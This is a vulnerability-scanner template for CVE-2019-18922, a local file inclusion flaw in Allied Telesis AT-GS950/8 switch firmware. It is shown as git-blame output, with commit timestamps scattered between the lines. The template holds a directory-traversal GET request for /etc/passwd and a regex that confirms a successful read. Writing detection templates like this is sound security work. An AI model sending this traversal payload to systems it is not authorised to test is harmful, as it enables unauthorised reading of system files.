2021-11-16 09:41:16 +00:00
|
|
|
id: CVE-2019-18922
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-11-16 09:08:49 +00:00
|
|
|
info:
|
2022-06-10 15:55:28 +00:00
|
|
|
name: Allied Telesis AT-GS950/8 - Local File Inclusion
|
2021-11-16 09:08:49 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-06-20 17:23:22 +00:00
|
|
|
description: |
|
|
|
|
Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 is susceptible to local file inclusion via its web interface.
|
2021-11-16 09:08:49 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/155504/Allied-Telesis-AT-GS950-8-Directory-Traversal.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://pastebin.com/dpEGKUGz
|
2022-06-10 15:55:28 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-18922
|
2021-11-16 09:08:49 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2019-18922
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: allied,lfi,packetstorm,cve,cve2019
|
2021-11-16 09:08:49 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-06-10 15:55:28 +00:00
|
|
|
|
2022-06-17 16:18:27 +00:00
|
|
|
# Enhanced by mp on 2022/06/17
|